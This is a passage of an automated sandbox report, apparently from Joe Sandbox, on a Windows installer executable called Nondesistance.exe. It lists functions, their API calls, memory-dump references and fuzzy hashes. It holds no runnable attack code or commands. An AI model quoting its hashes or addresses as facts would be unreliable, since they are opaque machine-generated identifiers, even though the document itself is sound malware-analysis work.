                                                                                                  • Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
                                                                                                  • Opcode Fuzzy Hash: e1bf17ceeca7babf037772fd815ac17da169c1b5a8a1c598223fa677f22f5cbc
                                                                                                  • Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D
                                                                                                  Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: ecbda0029c53e9a4e579cc28c48ab42295baff6aa2cc43667ddc013ae829b51b
                                                                                                  • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                                                  • Opcode Fuzzy Hash: ecbda0029c53e9a4e579cc28c48ab42295baff6aa2cc43667ddc013ae829b51b
                                                                                                  • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                                                  Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 00403F72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                  • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                                  • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                  • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                                  Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(00000028,?,?,00403D7A), ref: 00403F57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                  • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                                  • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                  • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                                  Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                  Function 00403F36 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 2492992576-0
                                                                                                  • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                  • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                                                                  • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                  • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                                                                  Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                                                  • Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
                                                                                                  • Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                                                  • Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29

                                                                                                  Non-executed Functions

                                                                                                  Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                                  • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 00404E45
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                                  • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  • Opcode ID: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
                                                                                                  • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                  • Opcode Fuzzy Hash: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
                                                                                                  • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                                                  Function 00404352 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                  • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                  • lstrcmpiA.KERNEL32(Call,Skuldertasken115 Setup: Installing), ref: 004044B9
                                                                                                  • lstrcatA.KERNEL32(?,Call), ref: 004044C5
                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                                    • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                    • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,?,00428838,?,?,000003FB,?), ref: 00404595
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                    • Part of subcall function 00404709: lstrlenA.KERNEL32(Skuldertasken115 Setup: Installing,Skuldertasken115 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                    • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                    • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Skuldertasken115 Setup: Installing), ref: 004047C2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A$C:\Users\user\dewater\reinsmen$Call$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 2624150263-842034559
                                                                                                  • Opcode ID: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                  • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                  • Opcode Fuzzy Hash: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                  • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                  Function 004064CB Relevance: .3, Instructions: 334COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                  • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                                  • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                  • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                                                  Function 00406CA2 Relevance: .3, Instructions: 300COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                  • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                                                  • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                  • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                                                  Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040E8
                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                                  • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040411A
                                                                                                  • GetSysColor.USER32(?), ref: 0040412B
                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                                  • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                                  • SetCursor.USER32(00000000), ref: 00404258
                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,?), ref: 0040426B
                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
